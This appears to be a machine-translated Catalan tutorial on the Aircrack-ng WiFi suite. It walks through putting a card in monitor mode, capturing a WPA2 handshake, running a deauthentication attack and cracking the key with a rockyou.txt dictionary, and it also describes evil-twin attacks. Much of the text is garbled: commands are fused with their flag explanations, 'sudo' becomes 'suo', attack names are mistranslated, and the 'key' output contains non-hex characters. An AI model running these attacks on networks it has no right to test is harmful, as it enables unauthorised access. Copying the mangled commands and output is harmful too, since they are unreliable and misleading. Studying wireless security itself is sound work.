Aircrack-ng és un conjunt complet de programari dissenyat per provar la seguretat de la xarxa WiFi. No és només una eina única, sinó una col·lecció d'eines, cadascuna de les quals realitza un propòsit particular. Es poden treballar diferents àrees de seguretat wifi, com ara controlar el punt d’accés, provar, atacar la xarxa, trencar la xarxa wifi i provar-la. L’objectiu clau d’Aircrack és interceptar els paquets i desxifrar els hash per trencar les contrasenyes. Admet gairebé totes les noves interfícies sense fils. Aircrack-ng és una versió millorada d 'un paquet d' eines antiquat Aircrack, ng fa referència a Nova generació . Algunes de les eines fantàstiques que funcionen juntes per dur a terme una tasca més gran.
Airmon:
Airmon-ng s’inclou al kit aircrack-ng que col·loca la targeta d’interfície de xarxa en mode monitor. Normalment, les targetes de xarxa només accepten paquets orientats a ells tal com es defineix a l’adreça MAC de la NIC, però amb airmon-ng també s’acceptaran tots els paquets sense fils, tant si són orientats com si no. Hauríeu de poder agafar aquests paquets sense enllaçar-los ni autenticar-vos amb el punt d’accés. S'utilitza per comprovar l'estat d'un punt d'accés posant la interfície de xarxa en mode monitor. En primer lloc, haureu de configurar les targetes sense fils per activar el mode monitor i, a continuació, eliminar tots els processos en segon pla si creieu que algun procés hi interfereix. Després de finalitzar els processos, es pot habilitar el mode de monitorització a la interfície sense fils executant l'ordre següent:
[correu electrònic protegit]: ~ $suoairmon-ng start wlan0#
També podeu desactivar el mode de monitor aturant airmon-ng en qualsevol moment mitjançant l'ordre següent:
[correu electrònic protegit]: ~ $suoairmon-ng stop wlan0#Airodump:
Airodump-ng s’utilitza per llistar totes les xarxes que ens envolten i per veure informació valuosa sobre elles. La funcionalitat bàsica de airodump-ng és ensumar paquets, de manera que està programat bàsicament per agafar tots els paquets que ens envolten mentre es posen en mode monitor. L’executarem contra totes les connexions que ens envolten i recopilarem dades com el nombre de clients connectats a la xarxa, les seves adreces Mac corresponents, l’estil de xifratge i els noms dels canals i després començarem a orientar la nostra xarxa objectiu.
En escriure l’ordre airodump-ng i donar-li el nom de la interfície de xarxa com a paràmetre, podem activar aquesta eina. Enumerarà tots els punts d’accés, la quantitat de paquets de dades, els mètodes d’encriptació i autenticació utilitzats i el nom de la xarxa (ESSID). Des del punt de vista de pirateria, les adreces Mac són els camps més importants.
[correu electrònic protegit]: ~ $suoairodump-ng wlx0mon
Aircrack:
Aircrack s’utilitza per trencar contrasenyes. Després de capturar tots els paquets amb airodump, podem trencar la clau per aircrack. Esborra aquestes claus mitjançant dos mètodes PTW i FMS. L'enfocament PTW es fa en dues fases. Al principi, només s’utilitzen els paquets ARP i només després, si la clau no s’esquerda després de la cerca, utilitza tots els altres paquets capturats. Un punt positiu de l'enfocament PTW és que no tots els paquets s'utilitzen per al cracking. En el segon enfocament, és a dir, FMS, fem servir tant els models estadístics com els algues de força bruta per trencar la clau. També es pot utilitzar un mètode de diccionari.
Aireplay:
Airplay-ng introdueix paquets a una xarxa sense fils per crear o accelerar el trànsit. Aireplay-ng pot capturar paquets de dues fonts diferents. El primer és la xarxa en directe i el segon són els paquets del fitxer pcap ja existent. Airplay-ng és útil durant un atac de desautenticació dirigit a un punt d'accés sense fils i a un usuari. A més, podeu realitzar alguns atacs com l’atac amb cafè amb cafè amb llet amb airplay-ng, una eina que us permet obtenir una clau del sistema del client. Podeu aconseguir-ho agafant un paquet ARP i després manipulant-lo i enviant-lo de nou al sistema. A continuació, el client crearà un paquet que pot ser capturat per airodump i el crack aeri esquerda la clau del paquet modificat. Algunes altres opcions d'atac de airplay-ng inclouen chopchop, fragment arepreplay, etc.
Base aèria:
Airbase-ng s’utilitza per transformar l’ordinador d’un intrús en un punt de connexió compromès perquè altres s’hi puguin enllaçar. Utilitzant Airbase-ng, podeu afirmar ser un punt d’accés legal i realitzar atacs man-in-the-middle a ordinadors connectats a la vostra xarxa. Aquest tipus d’atacs s’anomenen Evil Twin Attacks. És impossible per als usuaris bàsics discernir entre un punt d’accés legal i un punt d’accés fals. Per tant, l’amenaça de bessons malignes és una de les amenaces sense fils més amenaçadores que enfrontem avui.
Airolib-ng:
Airolib accelera el procés de pirateria mitjançant l’emmagatzematge i la gestió de les llistes de contrasenyes i el punt d’accés. El sistema de gestió de bases de dades utilitzat per aquest programa és SQLite3, que està disponible principalment a totes les plataformes. El trencament de contrasenya inclou el càlcul de la clau mestra parella mitjançant la qual s’extreu la clau transitòria privada (PTK). Mitjançant el PTK, podeu determinar el codi d’identificació del missatge de trama (MIC) per a un paquet determinat i, teòricament, trobar que el MIC sigui similar al paquet, de manera que si el PTK tenia raó, el PMK també tenia raó.
Per veure les llistes de contrasenyes i les xarxes d'accés emmagatzemades a la base de dades, escriviu l'ordre següent:
[correu electrònic protegit]: ~ $suoairolib-ng testdatabase: estadístiquesAquí la base de dades de prova és la base de dades a la qual voleu accedir o crear-la i –stats és l'operació que voleu realitzar-hi. Podeu fer diverses operacions als camps de la base de dades, com ara donar la màxima prioritat a algun SSID o alguna cosa així. Per utilitzar airolib-ng amb aircrack-ng, introduïu l'ordre següent:
[correu electrònic protegit]: ~ $suoaircrack-ng-rtestdatabase wpa2.eapol.capAquí fem servir els PMK ja calculats emmagatzemats a base de dades de proves per accelerar el procés de cracking de contrasenyes.
Cracking WPA / WPA2 amb Aircrack-ng:
Vegem un petit exemple del que pot fer aircrack-ng amb l'ajut d'algunes de les seves impressionants eines. Trencarem la clau precompartida d’una xarxa WPA / WPA2 mitjançant un mètode de diccionari.
El primer que hem de fer és enumerar les interfícies de xarxa que admeten el mode de monitorització. Això es pot fer mitjançant l'ordre següent:
[correu electrònic protegit]: ~ $suoairmon-ngXipset de controladors d’interfície PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.
Podem veure una interfície; ara, hem de posar la interfície de xarxa que hem trobat (wlx0) en mode monitor mitjançant l'ordre següent:
[correu electrònic protegit]: ~ $suoairmon-ng start wlx0
Ha activat el mode de monitor a la interfície anomenada wlx0mon .
Ara hauríem de començar a escoltar les emissions de routers propers a través de la nostra interfície de xarxa que hem posat en mode monitor.
[correu electrònic protegit]: ~ $suoairodump-ng wlx0monCH5 ][Transcorregut:30s][ 2020-12-02 00:17
Balises BSSID PWR#Dades, # / s CH MB ENC CIPHER AUTH ESSID
E4: 6F:13: 04: CE:31 -45 62 27 0 154e WPA2 CCMP PSK CrackIt
C4: E9:84:76:10: SER-63 77 0 0 654e. WPA2 CCMP PSK Hackme
C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07
74:DÓNA:88: FA:38: 02-68 28 2 0 1154e WPA2 CCMP PSK TP-Link_3802
Sonda BSSID STATION PWR Rate Frames
E4: 6F:13: 04: CE:315C: 3A:45: D7: EA: 8B -3 0- 1e8 5
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6
E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13
La nostra xarxa objectiu és Crackit en aquest cas, que s’executa actualment al canal 1.
Aquí, per tal d’esquivar la contrasenya de la xarxa de destinació, hem de capturar un encaix de mans de quatre vies, que passa quan un dispositiu intenta connectar-se a una xarxa. Podem capturar-lo mitjançant l'ordre següent:
[correu electrònic protegit]: ~ $suoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -en /casa wlx0-c : Canal
–Bss : Bssid de la xarxa de destinació
-en : El nom del directori on es col·locarà el fitxer pcap
Ara hem d’esperar que un dispositiu es connecti a la xarxa, però hi ha una manera millor de capturar un apretó de mans. Podem desautenticar els dispositius a l’AP mitjançant un atac de desautenticació mitjançant l’ordre següent:
[correu electrònic protegit]: ~ $suoaireplay-ng-0 -aE4: 6F:13: 04: CE:31a : Bssid de la xarxa de destinació
-0 : atac de desautenticació
Hem desconnectat tots els dispositius i ara hem d’esperar a que un dispositiu es connecti a la xarxa.
CH1 ][Transcorregut:30s][ 2020-12-02 00:02][Encaix de mans WPA: E4: 6F:13: 04: CE:31Balises BSSID PWR RXQ#Dades, # / s CH MB ENC CIPHER AUTH E
E4: 6F:13: 04: CE:31 -47 1 228 807 36 154è WPA2 CCMP PSK P
Sonda BSSID STATION PWR Rate Frames
E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1
E4: 6F:13: 04: CE:315C: 3A:45: D7: EA: 8B -290e- 1e0 22
E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt
E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1
Tenim un èxit i, mirant l’angle superior dret just al costat de l’hora, podem veure que s’ha capturat una encaixada de mans. Ara busqueu a la carpeta especificada ( / casa en el nostre cas) per a .pcap dossier.
Per trencar la clau WPA, podem utilitzar l'ordre següent:
[correu electrònic protegit]: ~ $suoaircrack-ng-a2 -enrockyou.txt-bE4: 6F:13: 04: CE:31encaixada de mansb: Bssid de la xarxa de destinació
-a2: mode WPA2
Rockyou.txt: el diccionaridossierusat
Encaixada de mans: capdossier quinconté una encaixada de mà capturada
Aircrack-ng1.2beta3
[00:01:49] 10566claus provades(1017.96a/s)
CLAU TROBADA! [m'oblides]
Clau mestra: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6F50C
Clau transitòria: 4D C4 5R 6T76 996G 7H 8D EC
H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B
A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089
8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B
MAC: CB 5A F8 CE62B2 1B F7 6F50C025 62E9 5D71
La clau de la nostra xarxa objectiu s’ha trencat amb èxit.
Conclusió:
Les xarxes sense fils són a tot arreu, utilitzades per totes i cadascuna de les empreses, des de treballadors que fan servir telèfons intel·ligents fins a dispositius de control industrial. Segons la investigació, gairebé més del 50 per cent del trànsit d'Internet passarà per WiFi el 2021. Les xarxes sense fils tenen molts avantatges, la comunicació exterior, l'accés ràpid a Internet en llocs on és gairebé impossible posar cables, pot expandir la xarxa sense instal·lar cables. per a qualsevol altre usuari i pot connectar fàcilment els vostres dispositius mòbils a les vostres oficines domèstiques mentre no hi esteu.
Malgrat aquests avantatges, hi ha un gran interrogant sobre la vostra privadesa i seguretat. Com aquestes xarxes; dins del rang de transmissió dels routers estan oberts a tothom, es poden atacar fàcilment i es poden comprometre fàcilment les vostres dades. Per exemple, si esteu connectat a una xarxa wifi pública, qualsevol persona connectada a aquesta xarxa pot comprovar fàcilment el trànsit de la vostra xarxa amb una mica d’intel·ligència i amb l’ajut d’eines fantàstiques disponibles i, fins i tot, desfer-la.